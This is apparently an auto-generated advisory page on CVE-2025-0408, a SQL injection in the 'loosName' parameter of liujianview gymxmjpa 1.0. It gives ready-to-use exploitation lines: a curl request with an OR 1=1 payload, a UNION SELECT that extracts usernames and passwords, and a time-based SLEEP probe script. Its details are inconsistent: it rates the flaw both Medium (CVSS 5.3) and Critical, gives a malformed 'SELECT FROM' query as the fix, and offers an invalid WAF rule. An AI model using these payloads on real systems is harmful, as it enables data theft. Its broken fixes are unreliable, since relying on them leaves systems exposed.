The CVE-2025-0408 vulnerability in liujianview gymxmjpa 1.0 allows remote attackers to execute arbitrary SQL queries via the `loosName` parameter in the `LoosDaoImpl` function (LoosController.java). The application fails to sanitize user-supplied input before concatenating it into SQL statements, enabling classic SQL injection. Attackers can manipulate database queries, extract sensitive data, or execute administrative operations. The vulnerability is exploitable over the network without authentication, earning a CVSS 4.0 score of 5.3 (Medium).
DailyCVE Form
Platform: liujianview gymxmjpa
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 01/12/2025
What Undercode Say:
Exploitation:
curl -X GET "http://target.com/api/loos?loosName=' OR 1=1--"
SQL Payload:
' UNION SELECT username, password FROM users--
Detection:
import requests
response = requests.get("http://target.com/api/loos?loosName=1' AND SLEEP(5)--")
if response.elapsed.total_seconds() >= 5:
print("Vulnerable to SQLi")
Mitigation:
// Use PreparedStatement in LoosDaoImpl String query = "SELECT FROM loos WHERE name = ?"; PreparedStatement stmt = connection.prepareStatement(query); stmt.setString(1, loosName);
Log Analysis:
grep -i "sql.error" /var/log/tomcat/catalina.out
WAF Rule:
location /api/loos {
deny "'|;|--|UNION";
}
Patch Verification:
jar xf gymxmjpa.war WEB-INF/classes/com/liujian/gymxmjpa/controller/LoosController.class strings LoosController.class | grep -i "preparedstatement"
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
